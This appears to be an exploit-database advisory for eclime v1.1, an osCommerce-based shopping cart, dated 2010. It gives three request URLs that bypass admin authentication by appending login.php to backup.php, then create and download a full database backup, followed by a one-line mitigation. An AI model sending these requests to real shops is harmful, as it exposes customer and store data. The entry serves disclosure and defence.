vendor:
eclime
by:
indoushka
6,5
CVSS
MEDIUM
Backup
287
CWE
Product Name: eclime
Affected Version From: eclime v1.1
Affected Version To: eclime v1.1
Patch Exists: N/A
Related CWE: N/A
CPE: a:eclime:eclime:1.1
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2010
eclime v1.1 => by Pass / Creat and Download Backup Vulnerability
eclime is a free opensource smarty based shopping cart build on osCommerce 2.2 solid engine, with many useful contributions added. An attacker can bypass authentication and create and download a backup of the database by accessing the URL http://127.0.0.1/eclime/admin/backup.php/login.php?action=backup and http://127.0.0.1/eclime/admin/backup.php/login.php?action=backupnow. The attacker can then download the backup by accessing the URL http://127.0.0.1/eclime/admin/backup.php/login.php?action=download&file=db_comm-20100301222138.sql.
Mitigation:
Ensure that authentication is properly implemented and enforced for all administrative functions.